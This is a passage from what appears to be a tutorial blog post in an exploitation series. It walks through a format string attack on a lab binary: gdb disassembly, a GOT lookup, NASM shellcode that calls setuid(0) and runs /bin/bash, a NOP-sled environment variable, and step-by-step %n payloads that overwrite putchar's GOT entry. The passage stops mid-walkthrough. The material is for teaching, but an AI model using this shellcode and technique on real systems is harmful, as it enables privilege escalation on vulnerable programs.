./app/span span class="code-line"span class="go"Reading symbols from /home/testuser/app...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"set disassembly-flavor intel/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble main/span/span span class="code-line"span class="go"Dump of assembler code for function main:/span/span span class="code-line"span class="go" 0x0804860c lt;+0gt;: push ebp/span/span span class="code-line"span class="go" 0x0804860d lt;+1gt;: mov ebp,esp/span/span span class="code-line"span class="go" 0x0804860f lt;+3gt;: and esp,0xfffffff0/span/span span class="code-line"span class="go" 0x08048612 lt;+6gt;: sub esp,0x20/span/span span class="code-line"span class="go" 0x08048615 lt;+9gt;: cmp DWORD PTR [ebp+0x8],0x1/span/span span class="code-line"span class="go" 0x08048619 lt;+13gt;: jg 0x804864c lt;main+64gt;/span/span span class="code-line"span class="go" 0x0804861b lt;+15gt;: mov DWORD PTR [esp],0x80487f0/span/span span class="code-line"span class="go" 0x08048622 lt;+22gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048627 lt;+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804862a lt;+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804862c lt;+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804862f lt;+35gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048634 lt;+40gt;: mov DWORD PTR [esp],0x80487f8/span/span span class="code-line"span class="go" 0x0804863b lt;+47gt;: call 0x80484a0 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048640 lt;+52gt;: mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="go" 0x08048647 lt;+59gt;: call 0x80484c0 lt;[email protected];/span/span span class="code-line"span class="go" 0x0804864c lt;+64gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804864f lt;+67gt;: add eax,0x4/span/span span class="code-line"span class="go" 0x08048652 lt;+70gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x08048654 lt;+72gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048657 lt;+75gt;: call 0x80486a2 lt;checkpassgt;/span/span span class="code-line"span class="go" 0x0804865c lt;+80gt;: mov DWORD PTR [esp+0x1c],eax/span/span span class="code-line"span class="go" 0x08048660 lt;+84gt;: cmp DWORD PTR [esp+0x1c],0x0/span/span span class="code-line"span class="go" 0x08048665 lt;+89gt;: je 0x804869b lt;main+143gt;/span/span span class="code-line"span class="go" 0x08048667 lt;+91gt;: mov DWORD PTR [esp],0x8048804/span/span span class="code-line"span class="go" 0x0804866e lt;+98gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048673 lt;+103gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x08048676 lt;+106gt;: add eax,0x4/span/span span class="code-line"span class="go" 0x08048679 lt;+109gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804867b lt;+111gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804867e lt;+114gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048683 lt;+119gt;: mov DWORD PTR [esp],0xa/span/span span class="code-line"span class="go" 0x0804868a lt;+126gt;: call 0x8048500 lt;[email protected];/span/span span class="code-line"span class="go" 0x0804868f lt;+131gt;: mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="go" 0x08048696 lt;+138gt;: call 0x80484c0 lt;[email protected];/span/span span class="code-line"span class="go" 0x0804869b lt;+143gt;: call 0x80486f0 lt;printfilegt;/span/span span class="code-line"span class="go" 0x080486a0 lt;+148gt;: leave /span/span span class="code-line"span class="go" 0x080486a1 lt;+149gt;: ret /span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pYou could do a bit of debugging to figure out what call to codeprintf/code is vulnerable but I can tell you that it is on line 36 because it is the second call to codeprintf/code after the password is checked (the call to codecheckpass/code on line 26)./p pThere is a call to putchar after, on line 38, let's hijack this, so now to figure out where this record is in memory:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanobjdump --dynamic-reloc ./app/span span class="code-line"/span span class="code-line"span class="go"./app: file format elf32-i386/span/span span class="code-line"/span span class="code-line"span class="go"DYNAMIC RELOCATION RECORDS/span/span span class="code-line"span class="go"OFFSET TYPE VALUE/span/span span class="code-line"span class="go"08049a1c R_386_GLOB_DAT __gmon_start__/span/span span class="code-line"span class="go"08049a2c R_386_JUMP_SLOT strcmp/span/span span class="code-line"span class="go"08049a30 R_386_JUMP_SLOT printf/span/span span class="code-line"span class="go"08049a34 R_386_JUMP_SLOT fclose/span/span span class="code-line"span class="go"08049a38 R_386_JUMP_SLOT _IO_getc/span/span span class="code-line"span class="go"08049a3c R_386_JUMP_SLOT puts/span/span span class="code-line"span class="go"08049a40 R_386_JUMP_SLOT __gmon_start__/span/span span class="code-line"span class="go"08049a44 R_386_JUMP_SLOT exit/span/span span class="code-line"span class="go"08049a48 R_386_JUMP_SLOT strlen/span/span span class="code-line"span class="go"08049a4c R_386_JUMP_SLOT __libc_start_main/span/span span class="code-line"span class="go"08049a50 R_386_JUMP_SLOT fopen/span/span span class="code-line"span class="go"08049a54 R_386_JUMP_SLOT putchar/span/span span class="code-line"span class="go"08049a58 R_386_JUMP_SLOT strncpy/span/span span class="code-line"/code/pre/div /td/tr/table pLine 18 is where our pointer to putchar is, it shows us that the pointer is at 08049a54 so this is the address that we need to write to./p pNext to find what address we want to write (the address of our shellcode so when putchar is called, our shellcode is run), we'll use the same method as in the last demonstration, we'll stick our shellcode in an environment variable and use getenv to figure out where it'll be in memory, we're also using the same shellcode as in part 1:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="c1"; run /bin/bash/span/span span class="code-line"/span span class="code-line"span class="k"global /spanspan class="nv"_start/span/span span class="code-line"/span span class="code-line"span class="k"section /spanspan class="nv".text/span/span span class="code-line"/span span class="code-line"span class="nl"_start:/span/span span class="code-line" span class="nf"jmp/span span class="nv"short/span span class="nv"Call_shellcode/span span class="c1"; jump to where our string is/span/span span class="code-line"/span span class="code-line"span class="nl"shellcode:/span/span span class="code-line" span class="nf"xor/span span class="nb"eax/spanspan class="p",/span span class="nb"eax/span span class="c1"; zero out eax/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"al/spanspan class="p",/span span class="mh"0x17/span span class="c1"; put 23 into eax to setuid/span/span span class="code-line"/span span class="code-line" span class="nf"xor/span span class="nb"ebx/spanspan class="p",/span span class="nb"ebx/span span class="c1"; zero out ebx/span/span span class="code-line"/span span class="code-line" span class="nf"int/span span class="mh"0x80/span span class="c1"; make the syscall setuid/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"eax/spanspan class="p",/span span class="nb"ebx/span span class="c1"; zero out eax/span/span span class="code-line"/span span class="code-line" span class="nf"pop/span span class="nb"ebx/span span class="c1"; pop the address of our string into ebx/span/span span class="code-line" span class="c1"; which is the first argument to execve/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"9/spanspan class="p"],/span span class="nb"al/span span class="c1"; put a 0 where the A is to null/span/span span class="code-line" span class="c1"; terminate the /bin/bash string/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"al/spanspan class="p",/span span class="mh"0xb/span span class="c1"; put the sys call number 11 into eax/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"10/spanspan class="p"],/span span class="nb"ebx/span span class="c1"; put a pointer to the beginning/span/span span class="code-line" span class="c1"; of the string where the BBBB is/span/span span class="code-line"/span span class="code-line" span class="nf"xor/span span class="nb"ecx/spanspan class="p",/span span class="nb"ecx/span span class="c1"; zero out the ecx register/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"14/spanspan class="p"],/span span class="nb"ecx/span span class="c1"; replace the CCCC with 0000/span/span span class="code-line"/span span class="code-line" span class="nf"lea/span span class="nb"ecx/spanspan class="p",/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"10/spanspan class="p"]/span span class="c1"; load the address that used to/span/span span class="code-line" span class="c1"; point to BBBB into ecx the second/span/span span class="code-line" span class="c1"; argument to execve/span/span span class="code-line"/span span class="code-line" span class="nf"lea/span span class="nb"edx/spanspan class="p",/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"14/spanspan class="p"]/span span class="c1"; load the address that used to/span/span span class="code-line" span class="c1"; point to CCCC into edx the third/span/span span class="code-line" span class="c1"; argument to execve/span/span span class="code-line"/span span class="code-line" span class="nf"int/span span class="mh"0x80/span span class="c1"; execute the syscall execve/span/span span class="code-line"/span span class="code-line"span class="nl"Call_shellcode:/span/span span class="code-line" span class="nf"call/span span class="nv"shellcode/span span class="c1"; call the start of the actual application/span/span span class="code-line" span class="nl"shell:/span span class="kd"db/span span class="s"quot;/bin/bashABBBBCCCCquot;/span span class="c1"; our string of/span/span span class="code-line" span class="c1"; arguments to execve/span/span span class="code-line"/code/pre/div /td/tr/table pNow we need to assemble, link, extract our shellcode then put it into an environment varable:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spannasm -f elf32 -o shell2.o shell2.nasm/span span class="code-line"span class="gp"[email protected]:~$ /spanld -o shell2 shell2.o/span span class="code-line"span class="gp"[email protected]:~$ /spanobjdump -d ./shell2span class="p"|/spangrep span class="s1"#39;[0-9a-f]:#39;/spanspan class="p"|/spangrep -v span class="s1"#39;file#39;/spanspan class="p"|/spancut -f2 -d:span class="p"|/spancut -f1-6 -dspan class="s1"#39; #39;/spanspan class="p"|/spantr -s span class="s1"#39; #39;/spanspan class="p"|/spantr span class="s1"#39;\t#39;/span span class="s1"#39; #39;/spanspan class="p"|/spansed span class="s1"#39;s/ $//g#39;/spanspan class="p"|/spansed span class="s1"#39;s/ /\\x/g#39;/spanspan class="p"|/spanpaste -d span class="s1"#39;#39;/span -s span class="p"|/spansed span class="s1"#39;s/^/quot;/#39;/spanspan class="p"|/spansed span class="s1"#39;s/$/quot;/g#39;/span/span span class="code-line"span class="go"quot;\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;/span/span span class="code-line"span class="gp"[email protected]:~$ /spanspan class="nb"export/span span class="nv"SHELLCODE/spanspan class="o"=/spanspan class="k"$(/spanpython -c span class="s1"#39;print quot;\x90quot; * 500 + quot;\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;#39;/spanspan class="k")/span/span span class="code-line"span class="gp"[email protected]:~$ /span./getenvaddr SHELLCODE ./app/span span class="code-line"span class="go"SHELLCODE will be at 0xbffff76d/span/span span class="code-line"/code/pre/div /td/tr/table pSo we have our address to write to '08049a54' and the address we want to write '0xbffff76d'./p pThe address we want to write is a very big number, this is why we need to control 2 addresses, we split the number in half, first we'll figure out how to write 'f76d', and then 'bfff'. So 'f76d' in decimal is '63341', so we'll minus 11 (the number of characters printer so far) and try to pad the rest, we'll use gdb to see what number we're trying to write:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app span class="s2"quot;AAAABBBB : %63330u%124\$x : %125\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAABBBB :/span/span span class="code-line"span class="go"322122294841414100 : 42424241/span/span span class="code-line"span class="gp"[email protected]:~$ /span./app span class="s2"quot;AAAABBBBC : %63330u%124\$x : %125\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAABBBBC :/span/span span class="code-line"span class="go"322122294841414141 : 42424242/span/span span class="code-line"span class="gp"[email protected]:~$ /spangdb -q ./app/span span class="code-line"span class="go"Reading symbols from /home/testuser/app...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;AAAABBBBC : %63330u%124\$n : %125\$xquot;/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;AAAABBBBC : %63330u%124\$n : %125\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAABBBBC :/span/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/i $eip/span/span span class="code-line"span class="go"=gt; 0xb7ea19d4 lt;vfprintf+16244gt;: mov %edx,(%eax)/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print/x $edx/span/span span class="code-line"span class="gp"$/spanspan class="nv"1/span span class="o"=/span 0xf76e/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;AAAABBBBC : %63329u%124\$n : %125\$xquot;/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;AAAABBBBC : %63329u%124\$n : %125\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAABBBBC :/span/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/i $eip/span/span span class="code-line"span class="go"=gt; 0xb7ea19d4 lt;vfprintf+16244gt;: mov %edx,(%eax)/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print/x $edx/span/span span class="code-line"span class="gp"$/spanspan class="nv"2/span span class="o"=/span 0xf76d/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print/x $eax/span/span span class="code-line"span class="gp"$/spanspan class="nv"3/span span class="o"=/span 0x612f7265/span span class="code-line"/code/pre/div /td/tr/table pSo we have the right number for the bottom half now, we need to figure out the last bit, the problem here is in gdb the memory layout is slightly different, as you can see its not trying to write to 41414141, firstly we need to put the actual memory addresses we want in there and fix this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;C : %63329u%124\$x : %125\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;C : %63329u%124\$x : %125\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½οΏ½C :/span/span span class="code-line"span class="go"3221222900612f7265 : 54007070/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CC : %63329u%124\$x : %125\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CC : %63329u%124\$x : %125\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½οΏ½CC : /span/span span class="code-line"span class="go"322122290070612f72 : 9a540070/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%124\$x : %125\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%124\$x : %125\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½οΏ½CCCC :/span/span span class="code-line"span class="go"3221222900707061 : 8049a54/span/span span class="code-line"span class="go"[Inferior 1 (process 31783) exited with code 01]/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%125\$x : %126\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%125\$x : %126\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½οΏ½CCCC :/span/span span class="code-line"span class="go"32212229008049a54 : 80049a56/span/span span class="code-line"span class="go"[Inferior 1 (process 31789) exited with code 01]/span/span span class="code-line"/code/pre/div /td/tr/table pOk we we have our pointers aligned again, I've set the second address to code\x56\x9a\x04\x80/code (or code80049a56/code) because we want an error to occur so we can see what values we are trying to write, this will ultimately be code08049a56/code which is 2 bytes different from the address we found in the GOT (code08049a54/code) (meaning this will be the second half of the memory address)./p pLet's get onto writing that last bit:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%125\$n : %126\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%125\$n : %126\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½οΏ½CCCC :/span/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/i $eip/span/span span class="code-line"span class="go"=gt; 0xb7ea19d4 lt;vfprintf+16244gt;: mov %edx,(%eax)/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print/x $edx/span/span span class="code-line"span class="gp"$/spanspan class="nv"4/span span class="o"=/span 0xf773/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print/x $eax/span/span span class="code-line"span class="gp"$/spanspan class="nv"5/span span class="o"=/span 0x80049a56/span span class="code-line"/code/pre/div /td/tr/table pSo this is now writing to our 2nd address. We want bfff to be written there, currently 'f773' is being written there, which is higher than bfff, so we do the calculation 1bfff - f773 = c88c or 51340 in decimal, let's try:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%125\$n : %51340u%126\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%125\$n : %51340u%126\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½οΏ½CCCC :/span/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/i $eip/span/span span class="code-line"span class="go"=gt; 0xb7ea19d4 lt;vfprintf+16244gt;: mov %edx,(%eax)/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print/x $edx/span/span span class="code-line"span class="gp"$/spanspan class="nv"6/span span class="o"=/span 0xf770/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print/x $eax/span/span span class="code-line"span class="gp"$/spanspan class="nv"7/span span class="o"=/span 0x72657375/span span class="code-line"/code/pre/div /td/tr/table pWe seem to have lost our position again, we will have to align the addresses again:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%125\$x : %51340u%126\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%125\$x : %51340u%126\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½οΏ½CCCC :/span/span span class="code-line"span class="go"32212228967070612f/span/span span class="code-line"span class="go"[Inferior 1 (process 914) exited with code 01]/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%125\$x : %51340u%127\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%125\$x : %51340u%127\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½οΏ½CCCC :/span/span span class="code-line"span class="go"322122289649a5400/span/span span class="code-line"span class="go"[Inferior 1 (process 920) exited with code 01]/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63329u%125\$x : %51340u%127\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63329u%125\$x : %51340u%127\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½οΏ½CCCCC :/span/span span class="code-line"span class="go"32212228968049a54/span/span span class="code-line"span class="go"[Inferior 1 (process 924) exited with code 01]/span/span span class="code-line"/code/pre/div /td/tr/table pWe've found the right place, now to make sure we are writing the right values:/p table 